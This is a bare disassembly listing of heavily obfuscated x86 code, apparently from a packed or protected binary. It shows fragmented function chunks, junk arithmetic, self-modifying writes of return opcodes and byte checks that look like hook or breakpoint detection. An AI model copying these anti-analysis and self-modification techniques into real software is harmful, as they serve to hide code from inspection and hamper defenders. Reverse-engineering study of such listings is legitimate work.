; FUNCTION CHUNK AT 0044721D SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00449633 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044E6E7 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0044EF34 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00450C49 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00451120 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00452781 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00453C82 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00454D51 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456000 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00458982 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0045AC2E SIZE 0000000A BYTES
push large dword ptr fs:0
mov large fs:0, esp
push dword ptr [ebp-10h]
jmp loc_452781
sub_4565B2 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B9B1
loc_4565C8: ; CODE XREF: sub_43B9B1+12j
call sub_4532E3
loc_4565CD: ; CODE XREF: sub_4408C2+C1CDj
jmp loc_453AAC
; END OF FUNCTION CHUNK FOR sub_43B9B1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444A86
loc_4565D2: ; CODE XREF: sub_444A86+Dj
jmp sub_455807
; END OF FUNCTION CHUNK FOR sub_444A86
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44F57E
loc_4565D7: ; CODE XREF: sub_44F57E:loc_43C92Fj
mov ecx, ebp
pop ebp
xchg esi, [esp-4+arg_0]
mov ebx, esi
pop esi
xchg edx, [esp-8+arg_4]
mov ebp, edx
pop edx
jmp loc_44B6B3
; END OF FUNCTION CHUNK FOR sub_44F57E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44C791
loc_4565EB: ; CODE XREF: sub_44C791-E126j
jnz loc_440B4C
jmp loc_4472FD
; END OF FUNCTION CHUNK FOR sub_44C791
; =============== S U B R O U T I N E =======================================
sub_4565F6 proc near ; DATA XREF: sub_44715B:loc_459427o
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0043A070 SIZE 00000005 BYTES
xchg ebx, [esp+0]
mov edx, ebx
pop ebx
mov eax, [esp-4+arg_0]
push edx
call sub_444E04
push offset loc_4555E4
jmp loc_43A070
sub_4565F6 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43ABBA
loc_45660F: ; CODE XREF: sub_43ABBA-17CAj
pop ecx
xor edx, ds:4000F9h
and edx, 0A771649Fh
rol edx, 0Dh
or edx, 29E074A4h
add edx, 0A7E153Ch
add edx, ebp
push edi
jmp loc_44B0A0
; END OF FUNCTION CHUNK FOR sub_43ABBA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43C413
loc_456633: ; CODE XREF: sub_43C413+6j
rol eax, 0Dh
push offset sub_439BB9
jmp nullsub_256
; END OF FUNCTION CHUNK FOR sub_43C413
; =============== S U B R O U T I N E =======================================
sub_456640 proc near ; CODE XREF: sub_443D3B+Ap
; ut7h7i2x:004446CEj
xchg ebx, [esp+0]
pop ebx
add ebx, 0DAC2F7A2h
mov [ebx], eax
pop ebx
lea eax, sub_44978D
mov byte ptr [eax], 0C3h
jmp sub_44978D
sub_456640 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43EDD8
loc_45665B: ; CODE XREF: sub_43EDD8:loc_458750j
ror eax, 14h
or edx, 27BDD283h
or ecx, eax
jnb loc_43E4A3
jmp loc_43D02E
; END OF FUNCTION CHUNK FOR sub_43EDD8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452EED
loc_456671: ; CODE XREF: sub_452EED:loc_43F4BBj
mov eax, [eax]
call sub_454596
loc_456678: ; CODE XREF: ut7h7i2x:0043B837j
; sub_43B847+5j ...
push offset sub_44EC28
jmp nullsub_257
; END OF FUNCTION CHUNK FOR sub_452EED
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45410C
loc_456682: ; CODE XREF: sub_45410C-1678Fj
push eax
loc_456683: ; CODE XREF: sub_45410C:loc_447DBFj
mov eax, [ebp-4]
cmp byte ptr [eax], 0F1h
jnz loc_443D17
jmp loc_43A8EA
; END OF FUNCTION CHUNK FOR sub_45410C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BD1
loc_456694: ; CODE XREF: sub_439BD1+67A7j
test eax, edi
jmp loc_45707A
; END OF FUNCTION CHUNK FOR sub_439BD1
; ---------------------------------------------------------------------------
loc_45669B: ; CODE XREF: ut7h7i2x:00445F01j
jnz loc_45452A
; =============== S U B R O U T I N E =======================================
sub_4566A1 proc near ; CODE XREF: ut7h7i2x:00440FFFp
; FUNCTION CHUNK AT 0043C906 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00459E31 SIZE 00000005 BYTES
xchg ecx, [esp+0]
pop ecx
push eax
mov eax, edx
nop
jmp loc_459E31
sub_4566A1 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_459E54
loc_4566AE: ; CODE XREF: sub_459E54:loc_442E5Cj
jz loc_455CB9
loc_4566B4: ; CODE XREF: ut7h7i2x:0045126Aj
jmp loc_4594A6
; END OF FUNCTION CHUNK FOR sub_459E54
; ---------------------------------------------------------------------------
db 0Fh, 8Ah, 34h
dd 81FFFE7Fh, 0F7737FFDh, 7392E97Bh
db 0FEh, 0FFh, 0C3h
; ---------------------------------------------------------------------------
loc_4566CB: ; CODE XREF: ut7h7i2x:0044A2E7j
jmp loc_4400F8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_442A4D
loc_4566D0: ; CODE XREF: sub_442A4D+17j
jmp loc_444ECA
; END OF FUNCTION CHUNK FOR sub_442A4D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_440944
loc_4566D5: ; CODE XREF: sub_440944+12j
jmp loc_44FADC
; END OF FUNCTION CHUNK FOR sub_440944
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_125. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452B14
loc_4566DB: ; CODE XREF: sub_452B14:loc_440EC8j
push offset loc_451EC7
jmp nullsub_403
; END OF FUNCTION CHUNK FOR sub_452B14
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44E2C4
loc_4566E5: ; CODE XREF: sub_44E2C4+B19Ej
jz loc_43B1B4
jmp loc_454F77
; END OF FUNCTION CHUNK FOR sub_44E2C4
; =============== S U B R O U T I N E =======================================
sub_4566F0 proc near ; CODE XREF: sub_43B979+Cp
; ut7h7i2x:0044CCA2j
xchg edi, [esp+0]
pop edi
push edx
push eax
mov eax, [ebp-18h]
push offset sub_44064B
jmp nullsub_260
sub_4566F0 endp
; ---------------------------------------------------------------------------
loc_456703: ; CODE XREF: ut7h7i2x:loc_44A8B0j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_450651
loc_456704: ; CODE XREF: sub_450651-3B26j
cmp byte ptr [eax], 0CFh
jz loc_44920C
mov eax, [ebp+var_4]
cmp byte ptr [eax], 0E9h
jz loc_44920C
jmp loc_451111
; END OF FUNCTION CHUNK FOR sub_450651
; ---------------------------------------------------------------------------
dw 2165h
dword_456720 dd 82951128h, 8C662982h, 0C6B18CB8h ; DATA XREF: sub_43AED9+A913o
; sub_43AED9:loc_446BA1o
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44E252
loc_45672D: ; CODE XREF: sub_44E252+2j
jmp loc_456847
; END OF FUNCTION CHUNK FOR sub_44E252
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44764B
loc_456732: ; CODE XREF: sub_44764B+Fj
jmp sub_44BBEC
; END OF FUNCTION CHUNK FOR sub_44764B
; ---------------------------------------------------------------------------
jo loc_43C0CD
push 9A70CCC1h
pop edx
jmp loc_4573FD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CDBA
loc_456748: ; CODE XREF: sub_43CDBA:loc_4422FDj
or edx, 10572C4Ah
add edx, 0EB641429h
xchg edx, [esp-4+arg_0]
jmp sub_44ED9F
; END OF FUNCTION CHUNK FOR sub_43CDBA
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_495. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449E96
loc_45675D: ; CODE XREF: sub_449E96+B45Aj
jmp loc_443B8B
; END OF FUNCTION CHUNK FOR sub_449E96
; ---------------------------------------------------------------------------
loc_456762: ; CODE XREF: ut7h7i2x:00454FADj
jmp loc_44CFB9
; ---------------------------------------------------------------------------
loc_456767: ; CODE XREF: ut7h7i2x:loc_4513A8j
xor ecx, 0B1905222h
test ecx, 200000h
jmp loc_44A71C
; ---------------------------------------------------------------------------
push 808C0EFFh
; START OF FUNCTION CHUNK FOR sub_455145
loc_45677D: ; CODE XREF: sub_455145:loc_45406Aj
jmp loc_44FEF2
; END OF FUNCTION CHUNK FOR sub_455145
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_191. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44FF0A
loc_456783: ; CODE XREF: sub_44FF0A:loc_441052j
push 9DF09C0Fh
pop edi
or edi, 77E72B8Eh
add edi, 4CE6A9h
xchg edi, [esp+4+var_4]
jmp loc_4519CD
; END OF FUNCTION CHUNK FOR sub_44FF0A
; ---------------------------------------------------------------------------
shl ebp, 8
jmp sub_452950
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45108E
loc_4567A5: ; CODE XREF: sub_45108E:loc_43ACDEj
mov eax, [esp+0]
push edx
call sub_43B234
loc_4567AE: ; CODE XREF: sub_458937+149Aj
jmp sub_4587DD
; END OF FUNCTION CHUNK FOR sub_45108E
; ---------------------------------------------------------------------------
loc_4567B3: ; CODE XREF: ut7h7i2x:004575E9j
jmp nullsub_514
; ---------------------------------------------------------------------------
loc_4567B8: ; CODE XREF: ut7h7i2x:00452D96j
jmp loc_455640
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43F7C8
loc_4567BD: ; CODE XREF: sub_43F7C8+13j
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_43F7C8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449217
loc_4567BF: ; CODE XREF: sub_449217+15j
jmp loc_44A984
; END OF FUNCTION CHUNK FOR sub_449217
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43E592
loc_4567C4: ; CODE XREF: sub_43E592+8CB1j
jmp loc_43C135
; END OF FUNCTION CHUNK FOR sub_43E592
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A556
loc_4567C9: ; CODE XREF: sub_43A556+98B0j
jmp nullsub_273
; END OF FUNCTION CHUNK FOR sub_43A556
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43FD68
loc_4567CE: ; CODE XREF: sub_43FD68+Aj
mov [ebp+var_4], eax
push 0
mov eax, [ebp+var_4]
jmp loc_455918
; END OF FUNCTION CHUNK FOR sub_43FD68
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4490E0
loc_4567DB: ; CODE XREF: sub_4490E0-3D5Aj
pop eax
and eax, 83F733B6h
add eax, 0E7AEEC15h
push offset sub_45A1E9
jmp nullsub_519
; END OF FUNCTION CHUNK FOR sub_4490E0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444A08
loc_4567F2: ; CODE XREF: sub_444A08+C42Dj
pop ebp
loc_4567F3: ; CODE XREF: sub_444A08:loc_450E27j
add edi, 0F9A9AB44h
xor edx, edi
push offset loc_43BE64
jmp loc_4396E0
; END OF FUNCTION CHUNK FOR sub_444A08
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4588D1
loc_456805: ; CODE XREF: sub_4588D1+10j
call sub_43F058
mov eax, [ebp-1Ch]
mov edx, [ebp-14h]
mov [eax], edx
; END OF FUNCTION CHUNK FOR sub_4588D1
; START OF FUNCTION CHUNK FOR sub_444029
loc_456812: ; CODE XREF: sub_444029:loc_453F7Aj
jnb loc_43B69E
jmp loc_44ADA0
; END OF FUNCTION CHUNK FOR sub_444029
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_442B3B
loc_45681D: ; CODE XREF: sub_442B3B:loc_442BEFj
; sub_44F43B-3790j
push edi
pushf
push 9CB0A9Ah
pop edi
rol edi, 0Ah
and edi, 39AADEB2h
xor edi, 2D6EA611h
loc_456834: ; CODE XREF: ut7h7i2x:loc_439EBCj
sub edi, 0A4881818h
jmp loc_446F39
; END OF FUNCTION CHUNK FOR sub_442B3B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44F300
loc_45683F: ; CODE XREF: sub_44F300:loc_448A3Bj
jz loc_44920C
xor eax, eax
loc_456847: ; CODE XREF: sub_44E252:loc_45672Dj
mov [ebp-5], al
mov al, [ebp-5]
push offset sub_449208
jmp loc_44BA88
; END OF FUNCTION CHUNK FOR sub_44F300
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_73. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43C0DA
loc_456858: ; CODE XREF: sub_43C0DA:loc_4417A4j
jmp loc_43BE41
; END OF FUNCTION CHUNK FOR sub_43C0DA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AB62
loc_45685D: ; CODE XREF: sub_43AB62+23D9j
jmp loc_441A54
; END OF FUNCTION CHUNK FOR sub_43AB62
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BF8
loc_456862: ; CODE XREF: sub_439BF8+8607j
jnz loc_44C8A1
loc_456868: ; CODE XREF: sub_442B3B:loc_442BB2j
; sub_44ACC5+10j
jmp loc_43B301
; END OF FUNCTION CHUNK FOR sub_439BF8
; ---------------------------------------------------------------------------
loc_45686D: ; CODE XREF: ut7h7i2x:00446866j
jmp nullsub_442
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44EC11
loc_456872: ; CODE XREF: sub_44EC11-15029j
jmp loc_43D3B3
; END OF FUNCTION CHUNK FOR sub_44EC11
; ---------------------------------------------------------------------------
test eax, esi
jmp loc_4570E2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B847
loc_45687E: ; CODE XREF: sub_43B847:loc_447498j
jl loc_448D8F
loc_456884: ; CODE XREF: ut7h7i2x:0044D6D9j
jmp loc_442B2C
; END OF FUNCTION CHUNK FOR sub_43B847
; ---------------------------------------------------------------------------
cmp esi, edx
jmp loc_448D87
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_450231
loc_456890: ; CODE XREF: sub_450231:loc_458E69j
pop edx
or edx, 0DDBDCDB7h
and edx, 8C9FE053h
loc_45689D: ; CODE XREF: ut7h7i2x:loc_43A156j
rol edx, 13h
xor edx, 6BA59797h
add edx, 61FF6002h
jmp loc_447A6D
; END OF FUNCTION CHUNK FOR sub_450231
; ---------------------------------------------------------------------------
loc_4568B1: ; CODE XREF: ut7h7i2x:loc_4530E9j
shl ebx, 17h
add eax, ebx
cmp ebx, ecx
call sub_453A91
; START OF FUNCTION CHUNK FOR sub_456397
loc_4568BD: ; CODE XREF: sub_456397+Fj
jmp loc_448E5F
; END OF FUNCTION CHUNK FOR sub_456397
; ---------------------------------------------------------------------------
loc_4568C2: ; CODE XREF: ut7h7i2x:0043B722j
jmp loc_454DC5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44445F
loc_4568C7: ; CODE XREF: sub_44445F+D59Dj
rol edx, 5
add edx, edi
rol edx, 5
xor edx, ebp
rol edx, 5
add edx, esp
rol edx, 5
jmp loc_4400E4
; END OF FUNCTION CHUNK FOR sub_44445F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_441765
loc_4568DE: ; CODE XREF: sub_441765:loc_44747Dj
call sub_455807
call sub_439431
loc_4568E8: ; CODE XREF: ut7h7i2x:00450D2Aj
jmp loc_43D21B
; END OF FUNCTION CHUNK FOR sub_441765
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44D26E
loc_4568ED: ; CODE XREF: sub_44D26E+Cj
jmp loc_44D5AA
; END OF FUNCTION CHUNK FOR sub_44D26E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4459EE
loc_4568F2: ; CODE XREF: sub_4459EE+8CF4j
jnp loc_449F4C
loc_4568F8: ; CODE XREF: sub_4459EE:loc_4477C5j
push 1
lea eax, [ebp-800h]
push edi
mov edi, eax
xchg edi, [esp+0]
call sub_452C82
test eax, eax
jmp loc_45AD2F
; END OF FUNCTION CHUNK FOR sub_4459EE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452D3D
loc_456912: ; CODE XREF: sub_452D3D:loc_43D748j
jnp loc_44D88F
jbe loc_43FCD3
jmp loc_445E51
; END OF FUNCTION CHUNK FOR sub_452D3D
; =============== S U B R O U T I N E =======================================
sub_456923 proc near ; CODE XREF: ut7h7i2x:0044BEBCj
; sub_446F56+12FF0p
; FUNCTION CHUNK AT 00443454 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C140 SIZE 00000014 BYTES
xchg edi, [esp+0]
pop edi
push 67A04F6Dh
pop esi
sub esi, 2A6752A6h
and esi, 0C9769B90h
or esi, 5584BEC0h
jmp loc_44C140
sub_456923 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_456944 proc near ; CODE XREF: ut7h7i2x:0044400Ap
; ut7h7i2x:00459A66j
; FUNCTION CHUNK AT 00450D82 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00451775 SIZE 0000000B BYTES
xchg eax, [esp+0]
pop eax
push edx
call sub_455807
push 0DCCB4EE6h
jmp loc_450D82
sub_456944 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44F43B
loc_456958: ; CODE XREF: sub_44F43B+Fj
jnz loc_441331
jmp loc_447D3C
; END OF FUNCTION CHUNK FOR sub_44F43B
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ebp
mov ebp, ecx
xchg ebp, [esp]
push edi
push 0EEA4266Eh
pop edi
jmp loc_455C79
; ---------------------------------------------------------------------------
push offset sub_442C48
jmp loc_43A3C1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4487B0
loc_456982: ; CODE XREF: sub_4487B0+Cj
pop ebx
rol ebx, 1Ch
sub ebx, ds:4000F8h
cmp ebx, 3BD82EAAh
jmp loc_44E55A
; END OF FUNCTION CHUNK FOR sub_4487B0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43D021
loc_456997: ; CODE XREF: sub_43D021:loc_444F86j
cmp ebx, edi
jmp loc_44D1C9
; END OF FUNCTION CHUNK FOR sub_43D021
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_443C4A
loc_45699E: ; CODE XREF: sub_443C4A+13CA5j
mov ecx, eax
adc ebp, ebx
jmp loc_444DC1
; END OF FUNCTION CHUNK FOR sub_443C4A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44C273
loc_4569A7: ; CODE XREF: sub_44C273-9061j
; ut7h7i2x:0044A903j ...
jb loc_4517CE
push eax
push 0C5BC1E3Bh
pop eax
rol eax, 11h
add eax, 0C3CDA1F6h
xchg eax, [esp+8+var_8]
jmp loc_4538C4
; END OF FUNCTION CHUNK FOR sub_44C273
; =============== S U B R O U T I N E =======================================
sub_4569C5 proc near ; DATA XREF: sub_449FF0+42B0o
mov dword ptr [ecx], 10001h
lea eax, loc_43CEE8
push edi
push 0D033AEC2h
pop edi
rol edi, 14h
xor edi, 5FAF7CCFh
add edi, ecx
jmp loc_45999D
sub_4569C5 endp
; ---------------------------------------------------------------------------
xor ebp, 899CABh
or esi, ecx
jmp sub_459BF0
; ---------------------------------------------------------------------------
loc_4569F5: ; DATA XREF: ut7h7i2x:00459B35o
mov [ebp-4], eax
push 0B7DC85B1h
pop eax
sub eax, 0E5B41CF4h
jmp loc_4458B7
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_175. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_442F0F
loc_456A0A: ; CODE XREF: sub_442F0F+15j
jmp loc_44C2FF
; END OF FUNCTION CHUNK FOR sub_442F0F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4558CC
loc_456A0F: ; CODE XREF: sub_4558CC:loc_455EA2j
mov esi, edx
xchg esi, [esp+4+var_4]
call sub_4589FE
mov eax, 0C684C00Ch
call sub_43AA94
jmp loc_442D83
; END OF FUNCTION CHUNK FOR sub_4558CC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_440B52
loc_456A28: ; CODE XREF: sub_440B52:loc_450B9Aj
add ebx, 0E47FD666h
call sub_4528A5
loc_456A33: ; CODE XREF: sub_4456C9+B9B0j
; ut7h7i2x:00452DBCj
jmp sub_4497C1
; END OF FUNCTION CHUNK FOR sub_440B52
; ---------------------------------------------------------------------------
mov ds:off_41D020, eax
lea eax, loc_44C12F
mov byte ptr [eax], 0C3h
jmp loc_44E1E4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4489DF
loc_456A4C: ; CODE XREF: sub_4489DF+3751j
mov eax, [esp-4+arg_0]
push edx
call sub_4439B0
mov eax, 0EFFDE014h
jmp loc_43D276
; END OF FUNCTION CHUNK FOR sub_4489DF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_448321
loc_456A5F: ; CODE XREF: sub_448321:loc_447B99j
; sub_448321+2218j
xor edx, 0B552D194h
add edx, ebp
add edx, 0BE816106h
mov edx, [edx]
jmp loc_4515E8
; END OF FUNCTION CHUNK FOR sub_448321
; =============== S U B R O U T I N E =======================================
sub_456A74 proc near ; CODE XREF: ut7h7i2x:0044055Bj
; sub_45633E:loc_448D78p
xchg edx, [esp+0]
pop edx
mov esp, ebp
pop ebp
retn
sub_456A74 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_442B3B
loc_456A7C: ; CODE XREF: sub_442B3B:loc_442BA5j
; ut7h7i2x:004486BBj
cmp dword ptr [ebp-10h], 1
jmp loc_43F9D5
; END OF FUNCTION CHUNK FOR sub_442B3B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452BE9
loc_456A85: ; CODE XREF: sub_452BE9:loc_44CE7Bj
pop ecx
and ecx, 0EB9DB476h
sub ecx, 0A9488F48h
push offset loc_447A4A
jmp nullsub_267
; END OF FUNCTION CHUNK FOR sub_452BE9
; ---------------------------------------------------------------------------
adc ebx, 0E72DC94Dh
jmp loc_457C1C
; ---------------------------------------------------------------------------
adc ebp, esi
jmp loc_449652
; ---------------------------------------------------------------------------
loc_456AAE: ; CODE XREF: ut7h7i2x:loc_43A192j
xchg ecx, [esp]
call sub_44D6FD
loc_456AB6: ; CODE XREF: ut7h7i2x:004581A5j
jns loc_44AAF3
jns loc_45030E
; START OF FUNCTION CHUNK FOR sub_455EC1
loc_456AC2: ; CODE XREF: sub_455EC1:loc_449987j
xor edx, 0BCD2A016h
add edx, 3A0B1E0h
xchg edx, [esp+4+var_4]
jmp sub_45292B
; END OF FUNCTION CHUNK FOR sub_455EC1
; =============== S U B R O U T I N E =======================================
sub_456AD6 proc near ; CODE XREF: sub_449700:loc_440D39p
; ut7h7i2x:004466E2j
xchg ebx, [esp+0]
pop ebx
pop ecx
pop ebp
retn
sub_456AD6 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_456ADD proc near ; CODE XREF: sub_407C57+Ep
; sub_419CB0+168p ...
; FUNCTION CHUNK AT 0044ECC9 SIZE 00000005 BYTES
push offset sub_444A12
jmp loc_44ECC9
sub_456ADD endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CFB6
loc_456AE7: ; CODE XREF: sub_43CFB6+1Bj
push edx
push eax
loc_456AE9: ; CODE XREF: sub_44E8A5:loc_43F87Ej
mov eax, [ebp-8]
cdq
add eax, [esp+0]
call sub_4456B6
push eax
ror eax, 16h
call sub_451BEC
loc_456AFE: ; DATA XREF: ut7h7i2x:004530EFo
shl ebx, 17h
add eax, ebx
cmp ebx, ecx
sbb eax, ebx
push esi
push 1793AE42h
pop esi
or esi, 3A7A611Eh
jmp loc_44EB53
; END OF FUNCTION CHUNK FOR sub_43CFB6
; =============== S U B R O U T I N E =======================================
sub_456B19 proc near ; DATA XREF: sub_458CBB-6E66o
; FUNCTION CHUNK AT 0043A600 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0043F4C5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043FF0E SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00443079 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00447FEC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044ABD2 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044D2CE SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044E658 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004523E8 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00459B0D SIZE 00000011 BYTES
push 0BD87F853h
pop edx
rol edx, 1Bh
and edx, 8D969B15h
jmp loc_459B0D
sub_456B19 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_456B2D proc near ; DATA XREF: sub_45A599-FE07o
; FUNCTION CHUNK AT 004449CB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457264 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 004590C4 SIZE 00000005 BYTES
mov eax, [esp+0]
push edx
call sub_45173A
push 85063358h
pop eax
or eax, 87AEDA7h
jmp loc_4590C4
sub_456B2D endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44445F
loc_456B47: ; CODE XREF: sub_44445F:loc_4396D4j
; sub_455383:loc_4465B5j
and edx, 0F0DD4B01h
test edx, 2000000h
jmp loc_455956
; END OF FUNCTION CHUNK FOR sub_44445F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_440CEC
loc_456B58: ; CODE XREF: sub_440CEC+1418Aj
jle loc_443656
; END OF FUNCTION CHUNK FOR sub_440CEC
; =============== S U B R O U T I N E =======================================
sub_456B5E proc near ; CODE XREF: sub_444374:loc_456161j
; FUNCTION CHUNK AT 00442225 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00451F24 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A5AA SIZE 00000028 BYTES
push ebx
push 0E4A5EFF3h
pop ebx
rol ebx, 15h
jmp loc_451F24
sub_456B5E endp
; =============== S U B R O U T I N E =======================================
sub_456B6D proc near ; DATA XREF: sub_43FF65+5D7Ao
; FUNCTION CHUNK AT 0043E73C SIZE 0000001C BYTES
; FUNCTION CHUNK AT 00441F33 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0044A8CE SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044B494 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044EEC2 SIZE 00000005 BYTES
add esi, 0A1626407h
xchg esi, [esp+0]
push 0
push 0
lea eax, [ebp-4]
push eax
call sub_440493
jmp loc_44B494
sub_456B6D endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43EF73
loc_456B88: ; CODE XREF: sub_43EF73:loc_4502CFj
xor ebx, 0FB71D14Bh
jmp loc_44A6BB
; END OF FUNCTION CHUNK FOR sub_43EF73
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44445F
loc_456B93: ; CODE XREF: sub_44445F:loc_442527j
jge loc_4594C2
loc_456B99: ; CODE XREF: sub_4393B6+1A109j
jmp sub_44937E
; END OF FUNCTION CHUNK FOR sub_44445F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44E6B4
loc_456B9E: ; CODE XREF: sub_44E6B4+Aj
jmp loc_44811A
; END OF FUNCTION CHUNK FOR sub_44E6B4
; ---------------------------------------------------------------------------
push eax
mov edx, 7ABBCC6Fh
test edi, ebp
jmp loc_44C6C4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444EAA
loc_456BB0: ; CODE XREF: sub_444EAA:loc_43E399j
jge loc_449077
jl loc_454985
sub esi, 589488AFh
jmp loc_449075
; END OF FUNCTION CHUNK FOR sub_444EAA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444029
loc_456BC7: ; CODE XREF: sub_444029-3D61j
pop eax
sub eax, 5B5F3C7Ch
or eax, 8D2B22AAh
xor eax, 8BD1A274h
rol eax, 13h
add eax, 6054E975h
jmp loc_45A308
; END OF FUNCTION CHUNK FOR sub_444029
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43F1B2
loc_456BE8: ; CODE XREF: sub_43F1B2+D7C3j
popf
sbb ebx, 9BD0616Fh
jmp loc_45978A
; END OF FUNCTION CHUNK FOR sub_43F1B2
; ---------------------------------------------------------------------------
